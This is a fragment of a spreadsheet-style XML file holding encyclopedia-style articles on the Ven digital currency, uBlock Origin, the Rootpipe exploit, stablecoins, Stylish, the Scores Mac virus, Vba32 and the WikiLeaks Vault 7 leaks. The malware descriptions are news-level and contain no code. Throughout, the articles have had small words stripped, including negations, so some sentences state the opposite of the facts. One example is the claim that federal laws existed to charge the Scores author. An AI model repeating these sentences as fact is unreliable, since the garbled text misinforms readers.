    <t>(sign: ven) representative digital currency. origin community currency created culture social network. claims value determined backing currencies, commodities assets. because currency privately run, true value impossible verify. trades major currencies floating exchange rates. listed 2014 lmax exchange. history culture launched july 2007. 2009, wall street journal described currency pegged dollar, used culture's users trade goods, services, knowledge. user described paid making introductions favors.in 2010, carbon pricing contracts introduced weighted basket determines value ven.in april 2011 culture announced first carbon offset credit trade priced ven, american carbon registry (acr), carbon registry winrock international, mata peito, environmental coalition includes culture partners. september 2011, culture announced would available thomson reuters' data network terminals.in november 2011, culture announced availability diamonds, investment grade wines gold, retail gold product sold individual karat units.in 2012, culture announced development funds, derivative financial products based ven, including micro-finance commodity asset pools.in january 2014, became first digital currency begin trading regulated forex markets, lmax exchange.according leaked emails, stan stalnaker pitched fundraising tool hillary clinton's campaign 2015. campaign chairman john podesta expressed interest offer, meeting scheduled time constraints.hub culture claims spread backing makes value stable. company also claims part basket includes carbon futures, estimated around environmentally friendly. also complementary currency references</t>
  </si>
  <si>
    <t>UBlock Origin</t>
  </si>
  <si>
    <t>ublock origin "you-block") free open-source browser extension content filtering, including blocking. extension available chrome, chromium, edge, firefox, opera, pale moon, well versions safari prior ublock origin received praise technology websites reported much less memory-intensive extensions similar functionality. ublock origin's stated purpose give users means enforce (content-filtering) choices.ublock origin still actively developed maintained creator lead developer raymond hill. history ublock ublock initially named "μblock" name later changed "ublock" avoid confusion greek letter (mu/micro) "μblock" pronounced. development started forking codebase http switchboard along another blocking extension called umatrix, designed advanced users. ublock developed raymond hill community-maintained block lists, adding features raising code quality release standards. first released june 2014 chrome opera extension, winter 2015 extension expanded browsers. ublock project official repository transferred chris aljoudi original developer raymond hill april 2015, frustration dealing requests. however hill immediately self-forked continued effort there. this version later renamed ublock origin completely divorced aljoudi's ublock. aljoudi created ublock.org host promote ublock request donations. response, ublock's founder raymond hill stated "the donations sought ublock.org benefiting contributed create ublock origin." development ublock stopped august 2015 sporadically updated since january 2017. july 2018, ublock.org acquired adblock since february 2019 began allowing "acceptable ads", program adblock plus allows deemed "acceptable", larger publishers fee.ublock origin remains independent allow payment. ublock origin raymond hill, founder original author ublock, 2015 continued work extension name ublock origin, sometimes stylized ublock0, abbreviated ubo.a joint sourcepoint comscore survey reported 833% growth rate ten-month tracking period ending august 2015, strongest growth among software listed. report attributed growth desire users pure blockers outside "acceptable advertising" program.in january 2016, ublock origin added repositories debian ubuntu 16.04. extension awarded "pick month" mozilla 2016.on december 2016, rolls released fork ublock origin microsoft edge browser (now known microsoft edge legacy). april 2020, fork deprecated microsoft replaced microsoft edge legacy chromium-based edge.as january 2021, ublock origin chrome extension million active users firefox version million active users.the project specifically refuses donations instead advises supporters donate maintainers block lists. features blocking filtering ublock origin supports majority adblock plus's filter syntax. popular filter lists easylist easyprivacy enabled default, along malware domain blocklist urlhaus. extensions capable importing hosts files number community-maintained lists available installation. among host files available, peter lowe's servers tracking list lists malware domains also enabled default. some additional features include dynamic filtering scripts iframes tool webpage element hiding. ublock origin includes growing list features available ublock, including: mode assist color vision deficiency. dynamic filtering feature. logging functionality. interface enhancements including inspector, privacy-oriented options block link prefetching, hyperlink auditing, address leaks webrtc (ubo-extra required block webrtc connections chromium).site-specific switches toggle blocking pop-ups, strict domain blocking, cosmetic filtering, blocking remote fonts, javascript disabling also added ublock origin. firefox version ublock origin extra feature helps foil attempts sites circumvent blockers. cname-uncloaking third-party trackers firefox november 2019, ublock origin user reported novel technique used sites bypass third-party tracker blocking. these sites link urls sub-domains page's domain, sub-domains resolve third-party hosts cname record. since initial contained sub-domain current page, interpreted browsers first-party request allowed filtering rules ublock origin (and similar extensions). ublock origin developer came solution using exclusive firefox 60+. feature implemented ublock origin 1.25, released february 2020. performance technology websites user reviews ublock origin regarded extension less resource-intensive extensions provide similar feature sets adblock plus. benchmark test, conducted august 2015 blocking extensions, showed ublock origin resource-efficient among extensions tested.ublock origin surveys style resources required individual page rather relying universal style sheet. extension takes snapshot filters user enabled, contributes accelerated browser start-up speed compared retrieving filters cache every time. supported platforms ublock origin actively developed applications based major layout engines. currently supported blink google chrome/chromium (desktop) opera (desktop) microsoft edge (chromium) (desktop) gecko firefox (desktop: 0.85.5 later) firefox android (mobile: 0.9.1.0 later) thunderbird (desktop: 1.3.0 later) seamonkey previously supported webkit safari (desktop: ublock origin 1.10.0 later (beta)). stopped working macos 10.15 catalina safari edgehtml microsoft edge (legacy) (ublock origin available windows store beta 1.10.0). also blocking adblock plus adblock ghostery noscript privacy badger notes references external links official website</t>
  </si>
  <si>
    <t>Rootpipe</t>
  </si>
  <si>
    <t>rootpipe security vulnerability found versions allows privilege escalation whereby user administrative rights, program executed administrative user, obtain superuser (root) access. this considered problematic first user account created furnished administrator rights default. leveraging security vulnerabilities system, unpatched browser, rootpipe could used attacker help gain complete control operating system.emil kvarnhammar truesec, security firm credited discovery, says found vulnerability several days binary analysis. recommends creating account without administrative privileges used normal everyday work using filevault.an older exploit issue later published exploit-db, suggesting issue dates back june 2010. appears exploit used author presentation trusteer rapport 44con 2011.the vulnerability reported apple inc. october 2014, reported present versions 10.7.5, 10.8.2, 10.9.5 10.10.2. 10.10.3 officially designated patched apple, kvarnhammar (crediting patrick wardle) blogged vulnerability still present version. july 2015, kvarnhammer noted additional restrictions introduced 10.10.4, adding comment days later believed then-current versions 10.9 (with security update 2015-005) 10.10 safe exploit.in november 2017, similar vulnerability revealed allowed logging root password. references</t>
  </si>
  <si>
    <t>Stablecoin</t>
  </si>
  <si>
    <t>stablecoins cryptocurrencies price designed pegged reference asset. reference asset fiat money, exchange-traded commodities (such precious metals industrial metals), cryptocurrency. background stablecoins number purposes. primarily, used payments. furthermore, cryptocurrencies bitcoin altcoins highly volatile. holders cannot escape widespread price falls without exiting market taking refuge stablecoins. stablecoins typically non-interest bearing. reserve-backed stablecoins reserve-backed cryptocurrencies coins stabilized assets. furthermore, coins, assuming managed good faith, mechanism redeeming asset(s) backing them, unlikely drop value underlying physical asset, arbitrage. backed stablecoins subject volatility risk associated backing asset. backed stablecoin backed decentralized manner, relatively safe predation, central vault, robbed, suffer loss confidence. fiat backing value stablecoins type based value backing currency, held third-party–regulated financial entity. setting, trust custodian backing asset crucial stability price stablecoin. fiat-backed stablecoins traded exchanges redeemable issuer. cost maintaining stability stablecoin equivalent cost maintaining backing reserve cost legal compliance, maintaining licenses, auditors business infrastructure required regulator. cryptocurrencies backed fiat currency common first type stablecoins market. their characteristics are: their value pegged currencies (most commonly dollar, euro, swiss franc) fixed ratio; tether realized off-chain, banks types regulated financial institutions serve depositaries currency used back stablecoin; amount currency used backing stablecoin reflect circulating supply stablecoin.examples: trueusd (tusd), tether (usdt), coin. commodity backing main characteristics backed stablecoins are: their value fixed commodities redeemable (more less) demand; there promise pay, unregulated individuals, agorist firms, even regulated financial institutions; amount commodity used back stablecoin reflect circulating supply stablecoin.holders commodity-backed stablecoins redeem stablecoins conversion rate take possession real assets. cost maintaining stability stablecoin cost storing protecting commodity backing. cryptocurrency backing cryptocurrency-backed stablecoins issued cryptocurrencies collateral, conceptually similar fiat-backed stablecoins. however, significant difference designs fiat collateralization typically happens blockchain, cryptocurrency crypto asset used back type stablecoins done blockchain, using smart contracts decentralized fashion. many cases, work allowing users take loan smart contract locking collateral, making worthwhile debt stablecoin ever decrease value. prevent sudden crashes, user takes loan liquidated smart contract collateral decrease close value withdrawal. significant features crypto-backed stablecoins are: value stablecoin collateralized another cryptocurrency cryptocurrency portfolio; executed on-chain smart contracts; supply stablecoins regulated on-chain, using smart contracts; price stability achieved introduction supplementary instruments incentives, collateral.the technical implementation type stablecoins complex varied fiat-collateralized kind introduces greater risks exploits bugs smart contract code. with tethering done on-chain, subject third-party regulation creating decentralized solution. potentially problematic aspect type stablecoins change value collateral reliance supplementary instruments. complexity non-direct backing stablecoin deter usage, difficult comprehend price actually ensured. nature highly volatile convergent cryptocurrency market, large collateral must also maintained ensure stability. live stablecoins projects type havven (the pair: nusd stablecoin collateral-backed nusd), (pair: collateralized debt position governance token used control supply) others. there also wrapped bitcoin (wbtc), bitgo. seigniorage-style/algorithmic stablecoins (not backed) seigniorage-style coins, also known algorithmic stablecoins, utilize algorithms control stablecoin's money supply, similar central bank's approach printing destroying currency. seigniorage-based stablecoins less popular form stablecoin.significant features seigniorage-style stablecoins are: adjustments made on-chain, collateral needed mint coins, value controlled supply demand algorithms, stabilizing price.basis example seigniorage-style coin.terrausd (ust), created kwon, meant maintain united states dollar. instead backed dollars, designed keep complex system connected another terra network token, terra (luna). 2022 broke price plunging cents, luna fell "virtually zero", all-time high $119.51. collapse wiped almost billion market capitalization course week.on june 2022, tron's algorithmic stablecoin, usdd, lost dollar. criticisms tether, largest stablecoin market capitalization, faced accusations unable provide audits reserves continually printing millions; many attributed unverifiable creation coins bitcoin's rise price 2017. failed abandoned stablecoin projects stablecoin project basis, received $100 million venture capital funding, shut december 2018, citing concerns regulation.stablecoins prone failure well volatility upkeep required many cases.diem (formerly libra) abandoned facebook/meta. social advantages bank international settlements lists possible merits subject enhancement anti-money laundering efforts, operational resilience, customer data protection, financial inclusion, compliance, cybersecurity. nellie liang, under secretary treasury domestic finance reported senate banking committee rapid growth stablecoin market capitalization potential financial services innovation require urgent congressional regulation. references</t>
  </si>
  <si>
    <t>Stylish</t>
  </si>
  <si>
    <t>stylish user style manager change appearance pages user's browser without changing content including user-supplied style sheets supplied site itself. stylish browser extension includes tools write user styles, install user styles written stylish users companion website. these user styles less selective, targeting page, pages domain, every page web. stylish originally developed jason barnabe xul/xpcom add-on mozilla firefox. chrome extension followed 2010, released blink-based opera 2013 firefox webextension 2017. similar extensions safari presto-based opera distributed 'stylish' developers barnabe's approval. technical details user styles code designed alter appearance one, some, sites. stylish firefox additionally style skin browser itself, android version support user interface built native android code. styles applied targets specified. individual user styles enabled disabled without restart browser. user styles added rules provided site, also override site's styling (often requiring !important keyword replacement rule). common uses blocking, applying color scheme, eliminating unwanted page elements.there three classes user styles. site styles change appearance particular site. global styles change appearance sites. styles change appearance firefox user interface, supported firefox. similar userchrome.css file used firefox mozilla-based browsers. privacy issues september 2016 jason barnabe, creator stylish userstyles.org, announced that, lost interest project, "chosen justin hindman next leader stylish userstyles.org." hindman prior connection either stylish userstyles.org, soon became clear barnabe simply sold hindman straw purchase israeli analytics company similarweb.in december 2016 hindman began releasing updates stylish chrome returned perfect replica user's browsing activity userstyles. january 2017 announced "partnership" similarweb "stylish users [would] joining similarweb’s market research panel.". firefox extension (3.0.1) released november, final update (2.1.1) stylish xul+xpcom add-on october migrate user styles webextension-compatible database.in july 2018, issues publicized software engineer, stylish pulled chrome store mozilla add-ons, well automatically uninstalled existing users. stylish returned mozilla add-ons august chrome store november logic sporting opt-in page asking users agree data collection extension installed. both platforms continue report users stylish popular alternative, stylus. alternatives stylish userscript manager greasemonkey tampermonkey local style sheet page adding style sheet content html &lt;style&gt; adding page. user styles userstyles.org downloaded user scripts userscript manager. alternative user style managers include stylus xstyle, derived stylish chrome, astyle, restyle, website theme manager.in firefox, user styles sites browser chrome added local files usercontent.css userchrome.css, respectively. firefox user must switch toolkit.legacyuserprofilecustomizations.stylesheets preference true about:config order load files. also browser extension stylus (browser extension) references external links official website</t>
  </si>
  <si>
    <t>Scores (computer virus)</t>
  </si>
  <si>
    <t>scores computer virus affecting macintosh machines. first discovered spring 1988. written disgruntled programmer specifically attacks applications development former company. these programs never released public. overview scores infects system, notepad, scrapbook files system system there simple identify infection. normal notepad scrapbook icons specific icons system little macintosh icons system icons blank document icons, good indication system infected. scores begins spread applications days infection. finder handler often become infected well. second payload, activated days, start causing crashes programs eric vult signatures run. both signatures found programs written electronic data systems plano, texas. program company run, virus crash system minutes. third payload activates days, actively stop programs vult signature writing disk. write disks happen within minutes, virus crash system. alleged author virus questioned federal bureau investigation (fbi) soon virus discovered. there federal laws charge author, remain free day. this loophole resulted "computer virus eradication 1988". references norstad, john. viruses. disinfectant 3.7.1, 1988-1997 northwestern university john norstad. info-mac digest (through virus-l), volume issue scores virus 1988-04-18 symantec antivirus, scores york times, technology, sabotage aimed computer company destroys government data. 1988-07-04 keith petersen. virus-l virus discussion list,fbi investigate rogue computer program nasa. 1988-07-06 joshua yeidel. virus-l virus discussion list, scores virus (mac) sighted washington state 1988-11-22 simpson, virus-l digest, description computer virus epidemic miami 1988-04-28</t>
  </si>
  <si>
    <t>Vba32 AntiVirus</t>
  </si>
  <si>
    <t>vba32 (virus block antivirus software vendor virusblokada personal computers running microsoft windows. detects neutralizes computer viruses, computer worms, trojan horses malware (backdoors, adware, spyware, etc.) real time demand. vba32 used antivirus engines virustotal. virusblokada virusblokada antivirus software vendor established 1997 belarus. 2010 discovered stuxnet, first malware attacks supervisory control data acquisition (scada) systems. program 2009 judit papp assessed vba32 antivirus product could detect percent unknown malware, compared percent detected avira's antivir premium percent detected microworld's escan anti-virus. also antivirus software comparison antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>Vault 7</t>
  </si>
  <si>
    <t>vault series documents wikileaks began publish march 2017, detailing activities capabilities united states central intelligence agency perform electronic surveillance cyber warfare. files, dating 2013 2016, include details agency's software capabilities, ability compromise cars, smart tvs, browsers (including google chrome, microsoft edge, mozilla firefox, opera), operating systems smartphones (including apple's google's android), well operating systems microsoft windows, macos, linux. internal audit identified malware tools tools 2016 compromised release. tools developed operations support branch c.i.a.the release vault redefine wikileaks “non-state hostile intelligence service.” july 2022 former software engineer joshua schulte convicted leaking documents wikileaks. history during january february 2017, united states justice department negotiating julian assange's attorney adam waldman immunity safe passage assange leave ecuadorian embassy london travel united states discuss risk minimization future wikileaks releases including redactions testify russia source wikileaks releases 2016. february 2017, waldman, bono, asked senator mark warner chairman united states senate intelligence committee questions assange. warner contacted director james comey told waldman "stand negotiations assange," waldman complied. however, david laufman waldman's counterpart justice department replied, "that's b.s. you're standing neither according mcgovern march 2017, waldman laufman near agreement justice department assange "risk mitigation approaches relating documents wikileaks' possession control, redaction agency personnel hostile jurisdictions," return acceptable immunity safe passage agreement" formal agreement never reached damaging disclosure "marble framework" released wikileaks march 2017.in february 2017, wikileaks began teasing release "vault series cryptic messages twitter, according media reports. later february, wikileaks released classified documents describing monitored 2012 french presidential election. press release leak stated published context forthcoming vault series."in march 2017, intelligence enforcement officials said international wire agency reuters aware security breach, vault since late-2016. officials said focusing "contractors" possible source leaks.in 2017, federal enforcement identified software engineer joshua adam schulte suspected source vault july 2022, schulte convicted leaking documents wikileaks. april 2017, director mike pompeo declared wikileaks "hostile intelligence service." september 2021, yahoo! news reported 2017 wake vault leaks, considered kidnapping assassinating assange, spying associates wikileaks, sowing discord among members, stealing electronic devices. after many months deliberation, proposed plans scrapped combination legal moral objections. 2021 yahoo news article, former trump national security official stated, never desire revenge". publications part "year zero" first batch documents named "year zero" published wikileaks march 2017, consisting 7,818 pages attachments, purportedly center cyber intelligence, contained pages former contractor leaker, edward snowden's release time. wikileaks released year zero online locked archive earlier week, revealing passphrase 7th. passphrase referred president kennedy quote wanted splinter thousand pieces scatter winds”.wikileaks name source, said files "circulated among former u.s. government hackers contractors unauthorized manner, provided wikileaks portions archive." according wikileaks, source "wishes initiate public debate security, creation, use, proliferation democratic control cyberweapons" since tools raise questions "urgently need debated public, including whether c.i.a.'s hacking capabilities exceed mandated powers problem public oversight agency."wikileaks attempted redact names identifying information documents release, faced criticism leaving details unredacted. wikileaks also attempted allow connections people drawn unique identifiers generated wikileaks. also said would postpone releasing source code cyber weapons, reportedly several hundred million lines long, "until consensus emerges technical political nature c.i.a.'s program 'weapons' analyzed, disarmed published." wikileaks founder julian assange claimed part larger series.the released statement saying, "the american public deeply troubled wikileaks disclosure designed damage intelligence community's ability protect america terrorists adversaries. such disclosures jeopardize personnel operations, also equip adversaries tools information harm."in statement issued march 2017, assange said technology companies contacted agreed disagreed with, questioned termed wikileaks' standard industry disclosure plan. standard disclosure time vulnerability days company responsible patching software given full details flaw. according wikileaks, mozilla provided information vulnerabilities, "google companies" confirmed receiving initial notification. wikileaks stated: "most lagging companies conflicts interest classified work government agencies. practice associations limit industry staff security clearances fixing holes based leaked information cia. should companies choose secure users attacks users prefer organizations mozilla european companies prioritize users government contracts". part "dark matter" march 2017 wikileaks published second release vault material, entitled "dark matter". publication included documentation several efforts hack apple's iphones macs. these included "sonic screwdriver" malware could thunderbolt interface bypass apple's password firmware protection. part "marble" march 2017, wikileaks published third part vault documents, entitled "marble". contained source code files cia's marble framework. used obfuscate, scramble, malware code attempt make anti-virus firms investigators cannot understand code attribute source. according wikileaks, code also included de-obfuscator reverse obfuscation effects. part "grasshopper" april 2017, wikileaks published fourth vault documents, dubbed "grasshopper". publication contains documents cia's grasshopper framework, used build customized persistent malware payloads microsoft windows operating systems. grasshopper focused personal security product (psp) avoidance. psps antivirus software security essentials, symantec endpoint kaspersky part "hive" april 2017, wikileaks published fifth part vault documents, titled "hive". based top-secret virus program created "embedded development branch" (edb). documents published wikileaks related hive multi-platform malware suite. back-end infrastructure public-facing https interface used transfer information target desktop computers smartphones cia, open devices receive commands operators execute specific tasks, hiding presence behind unsuspicious-looking public domains masking interface known "switchblade" (also known listening post (lp) command control (c2)). part "weeping angel" april 2017, wikileaks published sixth part vault material, code-named "weeping angel", hacking tool co-developed used exploit series smart purpose covert intelligence gathering. once installed suitable televisions stick, hacking tool enables televisions' built-in microphones possibly video cameras record surroundings, televisions falsely appear turned off. recorded data either stored locally television's memory sent internet cia. allegedly agencies collaborated develop malware coordinated work joint development workshops. part publication, "weeping angel" second major hacking tool notably references british television show, doctor who, alongside "sonic screwdriver" "dark matter". part "scribbles" april 2017, wikileaks published seventh part vault materials, dubbed "scribbles". leak includes documentation source code tool intended track documents leaked whistleblowers journalists embedding beacon tags classified documents trace leaked them. tool affects microsoft office documents, specifically "microsoft office 2013 windows x64), documents office versions 97-2016 (office documents work!) documents locked, encrypted, password-protected". when watermarked document opened, invisible image within document hosted agency's server loaded, generating http request. request logged server, giving intelligence agency information opening opened. however, watermarked document opened alternative word processor image visible viewer. documentation also states document viewed offline protected view, watermarked image able contact home server. this overridden user enables editing. part "archimedes" 2017, wikileaks published eighth part vault documents, titled "archimedes". according u.s. sans institute instructor jake williams, analyzed published documents, archimedes virus previously codenamed "fulcrum". according cyber security expert enisa member pierluigi paganini, operators archimedes redirect local area network (lan) browser sessions targeted computer computer controlled sessions routed users. this type attack known man-in-the-middle (mitm). with publication wikileaks included number hashes claim used potentially identify archimedes virus guard future. paganini stated potential targeted computers search hashes systems check systems attacked cia. part "aftermidnight" "assassin" 2017, wikileaks published part nine vault materials, "aftermidnight" "assassin". aftermidnight malware installed target personal computer disguises file, executed user's computer reboots. triggers connection cia's command control (c2) computer, downloads various modules run. assassin, similar aftermidnight counterpart, deceptively runs inside windows service process. operators reportedly assassin execute series tasks, collect, periodically send user data listening post(s) (lp). similar backdoor trojan behavior. both aftermidnight assassin windows operating system, persistent, periodically beacon configured either request tasks send private information cia, well automatically uninstall date time. part "athena" 2017, wikileaks published tenth part vault documents, titled "athena". published user guide, demo, related documents created september 2015 february 2016. they malware allegedly developed august 2015, roughly month microsoft released windows firm statements difficult compromise. both primary "athena" malware secondary malware named "hera" similar theory grasshopper aftermidnight malware significant differences. differences athena hera developed hampshire private corporation called siege technologies. during bloomberg 2014 interview founder siege technologies confirmed justified development malware. athena malware completely hijacks windows' remote access services, hera hijacks windows dnscache service. both athena hera also affect current versions windows including, limited windows server 2012 windows another difference types encryption used infected computers listening posts (lp). similarities, exploit persistent files create backdoor communicate cia's steal private data, send servers, delete private data target computer, well command control (c2) operatives send additional malicious software specific tasks attacked computer. designed deceive computer security software. beside published detailed documents, wikileaks provided evidence suggesting used athena not. part "pandemic" june 2017, wikileaks published part vault materials, "pandemic". this tool serves persistent implant affecting windows machines shared folders. functions file system filter driver infected computer, listens server message block traffic detecting download attempts computers local network. "pandemic" answer download request behalf infected computer. however, replace legitimate file malware. order obfuscate activities, "pandemic" modifies replaces legitimate file transit, leaving original server unchanged. implant allows files modified time, maximum individual file size 800mb. while stated leaked documentation, possible newly infected computers could become "pandemic" file servers, allowing implant reach targets local network. part "cherry blossom" june 2017, wikileaks published part vault materials, entitled "cherry blossom". cherry blossom used command control server called cherry tree custom router firmware called flytrap monitor internet activity targets, scan “email addresses, chat usernames, addresses voip numbers" redirect traffic. part "brutal kangaroo" june 2017, wikileaks published part vault materials, manuals "brutal kangaroo". brutal kangaroo project focused malware designed compromise air-gapped computer networks infected drives. brutal kangaroo included tools drifting deadline, main tool, shattered assurance, server automates thumb drive infection, shadow, tool coordinate compromised machines, broken promise, tool exfiltrating data air-gapped networks. part "elsa" june 2017, wikileaks published part vault materials, manual project entitled "elsa". elsa tool used tracking windows devices nearby wifi networks. part "outlawcountry" june 2017, wikileaks published part vault materials, manual project entitled "outlawcountry". outlawcountry kernel module linux agents linux servers redirect outgoing traffic linux computer chosen site. part "bothanspy" july 2017, wikileaks published part vault materials, manual project entitled "bothanspy". bothanspy hacking tool made steal credentials windows computers. part "highrise" july 2017, wikileaks published part vault materials, manual project entitled "highrise". highrise hacking tool, also known tidecheck, used intercept redirect messages android phones using versions 4.3. highrise could also used encrypted communications channel agents supervisors. part "ucl raytheon" july 2017, wikileaks published part vault materials, raytheon. part "imperial" july 2017, wikileaks published part vault materials, manuals project entitled "imperial". imperial included three tools named achilles, aeris seapea. achilles tool turning macos install files trojan malware. aeris malware implant posix systems, seapea rootkit. part "dumbo" august 2017, wikileaks published part vault materials, manuals project entitled "dumbo". dumbo tool agency used disable webcams, microphones, surveillance tools wifi bluetooth allow field agents perform missions. part "couchpotato" august 2017, wikileaks published part vault materials, manual project couchpotato. couchpotato tool intercepting saving remote video streams, people's surveillance systems. part "expresslane" august 2017, wikileaks published part vault materials cia's "expresslane" project. these documents highlighted cyber operations conducts services liaises with, including national security agency (nsa), department homeland security (dhs) federal bureau investigation (fbi). expresslane, covert information collection tool, used exfiltrate biometric data collection systems services liaises with. expresslane installed cover upgrading biometric software liaison services cia's office technical services (ots) agents without knowledge. part "angelfire" august 2017, wikileaks published part vault documents, manual project angelfire. angelfire malware framework made infect computers running windows windows made five parts. solartime malware modified boot sector load wolfcreek, self-loading driver loaded drivers. keystone responsible loading malware. badmfs covert file system malware, windows transitory file system newer alternative badmfs. manual included long list problems tools. part "protego" protego, part vault documents, published september 2017. vault november, 2017, wikileaks began publishing vault described "source code analysis software projects including described vault7 series." stated intention vault publication "enable investigative journalists, forensic experts general public better identify understand covert infrastructure components." vault release source code development logs hive, covert communications platform malware. wikileaks published hive documentation part vault april 2017. organization cyber warfare wikileaks said documents came isolated, high-security network situated inside cia's center cyber intelligence (cci) langley, virginia." documents allowed wikileaks partially determine structure organization cci. reportedly entire unit devoted compromising apple products.the cybersecurity firm symantec analyzed vault documents found described software closely matched cyberattacks "longhorn," monitored since 2014. symantec previously suspected "longhorn" government-sponsored tracked usage targets countries. frankfurt base first portion documents made public march 2017, vault "year zero", revealed secret unit used german city frankfurt starting point hacking attacks europe, china middle east. according documents, u.s. government uses consulate general office frankfurt hacker base cyber operations. wikileaks documents reveal frankfurt hackers, part center cyber intelligence europe (ccie), given cover identities diplomatic passports obfuscate customs officers gain entry germany.the chief public prosecutor general federal court justice karlsruhe peter frank announced march 2017 government conducting preliminary investigation launch major probe activities conducted consulate also broadly whether people germany attacked cia. germany's foreign minister sigmar gabriel social democratic party responded documents vault "year zero" used frankfurt base digital espionage operations, saying germany information cyber attacks. umbrage documents reportedly revealed agency amassed large collection cyberattack techniques malware produced hackers. this library reportedly maintained cia's remote devices branch's umbrage group, examples using techniques source code contained "umbrage component library" repository. according wikileaks, recycling techniques third-parties umbrage, increase total number attacks, also mislead forensic investigators disguising attacks work groups nations. among techniques borrowed umbrage file wiping implementation used shamoon. according world, techniques code snippets used internal projects, whose result cannot inferred leaks. world commented practice planting "false flags" deter attribution development cyberattacks: russian, north korean israeli hacker groups among suspected using false flags.according study zetter intercept, umbrage probably much focused speeding development repurposing existing tools, rather planting false flags. robert graham, errata security told intercept source code referenced umbrage documents "extremely public", likely used multitude groups state actors. graham added: "what conclusively evidence documents they're creating snippets code projects they're reusing methods code find internet. elsewhere talk obscuring attacks can't coming from, there's concrete plan false flag operation. they're trying 'we're going make look like russia'." false flag theories vault documents first released, wikileaks described umbrage substantial library attack techniques 'stolen' malware produced states including russian federation," tweeted, "cia steals groups virus malware facilitating false flag attacks." conspiracy theory soon emerged alleging framed russian government interfering 2016 u.s. elections. conservative commentators sean hannity coulter speculated possibility twitter, rush limbaugh discussed radio show. russian foreign minister sergey lavrov said vault showed "the could access 'fingerprints' them."cybersecurity writers, buchanan kevin poulsen, skeptical theories. poulsen wrote, "the leaked catalog organized country origin, specific malware used russian hackers nowhere list." marble framework documents describe marble framework, string obfuscator used hide text fragments malware visual inspection. part program, foreign languages used cover source hacks. according wikileaks, reached 2015 used throughout 2016.in release, wikileaks described primary purpose "marble" insert foreign language text malware mask viruses, trojans hacking attacks, making difficult tracked cause forensic investigators falsely attribute code wrong nation. source code revealed marble examples chinese, russian, korean, arabic persian. these languages us's main cyber-adversaries china, russia, north korea, iran.analysts called wikileaks' description marble's main purpose inaccurate, telling hill main purpose probably avoid detection antivirus programs.marble also contained deobfuscator tool could reverse text obfuscation.security researcher nicholas weaver international computer science institute berkeley told washington post: "this appears technically damaging leaks ever done wikileaks, seems designed directly disrupt ongoing operations." compromised technology software cds/dvds hammerdrill cd/dvd collection tool collects directory walks files configured directory filename pattern well logging cd/dvd insertion removal events. v2.0 adds jumping capability injects trojan 32-bit executables burned disc nero. additionally, v2.0 adds status, termination on-demand collection feature controlled hammerdrillstatus.dll, hammerdrillkiller.dll hammerdrillcollector.dll. logging also fingerprints discs hashing first blocks image, enables unique identification multi-sessions discs even data added removed. also logs anytime hammerdrill trojaned binary seen disc. apple products after wikileaks released first installment vault "year zero", apple stated "many issues leaked today already patched latest ios," company "continue work rapidly address identified vulnerabilities."on march 2017, wikileaks released "dark matter", second batch documents vault series, detailing hacking techniques tools focusing apple products developed embedded development branch (edb) cia. leak also revealed targeting iphone since 2008, year device released. these projects attacked apple's firmware, meaning attack code would persist even device rebooted. "dark matter" archive included documents 2009 2013. apple issued second statement assuring based "initial analysis, alleged iphone vulnerability affected iphone fixed 2009 iphone released." additionally, preliminary assessment showed "the alleged vulnerabilities previously fixed macs launched 2013". cisco wikileaks said march 2017 twitter "cia secretly exploiting" vulnerability huge range cisco router models discovered thanks vault documents. learned year exploit flaws cisco's widely used internet switches, direct electronic traffic, enable eavesdropping. cisco quickly reassigned staff projects turn focus solely analyzing attack figure hacking worked, could help customers patch systems prevent criminal hackers spies using similar methods.on march, cisco researchers confirmed study vault documents showed developed malware could exploit flaw found cisco's switch models alter take control network.cisco issued warning security risks, patches available, cisco provided mitigation advice. smartphones/tablets electronic tools reportedly compromise apple's google's android operating systems. adding malware android operating system, tools could gain access secure communications made device. messaging services according wikileaks, android smartphone penetrated agency collect "audio message traffic encryption applied". some agency's software reportedly able gain access messages sent instant messaging services. this method accessing messages differs obtaining access decrypting already encrypted message. while encryption messengers offer end-to-end encryption, telegram, whatsapp signal, reported cracked, encryption bypassed capturing input encryption applied, methods keylogging recording touch input user. commentators, among snowden cryptographer security pundit bruce schneier, observed wikileaks incorrectly implied messaging apps themselves, underlying encryption, compromised implication turn reported period york times mainstream outlets. vehicle control systems document reportedly showed researching ways infect vehicle control systems. wikileaks stated, "the purpose control specified, would permit engage nearly undetectable assassinations." this statement brought renewed attention conspiracy theories surrounding death michael hastings. windows documents refer "windows injection" exploit windows windows vista windows operating systems. this would allow user malicious intents hide malware another application. however, computer must already compromised another method injection take place. commentary march 2017, edward snowden commented importance release, stating reveals united states government "developing vulnerabilities products" "then intentionally keeping holes open", considers highly reckless.on march 2017, nathan white, senior legislative manager internet advocacy group access now, writes: today, digital security compromised stockpiling vulnerabilities rather working companies patch them. united states supposed process helps secure digital devices services 'vulnerabilities equities process.' many vulnerabilities could responsibly disclosed patched. this leak proves inherent digital risk stockpiling vulnerabilities rather fixing them. march 2017, mathews, contributor forbes, wrote hacking techniques described vault already known many cybersecurity experts.on march 2017, note revealed techniques tools likely used targeted surveillance revealed edward snowden.on april 2017, ashley gorski, american civil liberties union staff attorney called "critical" understand "these vulnerabilities exploited government foreign governments cyber criminals around world." justin cappos, professor computer science engineering department york university asks government knows problem phone guys could hack phone ability you, weakness counterterrorism, spying capabilities, problem everyone?".on april 2017, cindy cohn, executive director francisco-based international nonprofit digital rights group electronic frontier foundation, said: c.i.a. walking past front door lock broken, least tell maybe even help fixed." "and worse, lost track information kept criminals hostile foreign governments know broken lock." furthermore, stated "failed accurately assess risk disclosing vulnerabilities. even agencies like responsibility protect security privacy americans." "the freedom private conversation free worry hostile government, rogue government agent competitor criminal listening central free society". while strict privacy laws europe, fourth amendment constitution guarantee right free unreasonable searches seizures.on 2017 microsoft president chief legal officer brad smith wrote "this emerging pattern 2017. seen vulnerabilities stored show wikileaks," words, smith expressed concern fact stockpiled computer vulnerabilities, turn stolen them, failed inform microsoft timely fashion security breach, result privacy security customers around world potentially negatively affected extended period caused widespread damage. also notes references external links vault wikileaks julian assange press conference cia/vault7/yearzero, thursday march 2017, official wikileaks youtube channel</t>
  </si>
  <si>
    <t>Variety Jones and Smedley</t>
  </si>
  <si>
